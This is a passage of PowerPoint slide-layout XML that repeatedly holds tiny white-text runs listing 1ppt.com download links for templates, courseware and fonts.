              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout235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35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35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35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35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35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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout235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35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35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35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3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36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36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36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36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36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36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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout236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36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36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36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3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37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37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37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37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37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37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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
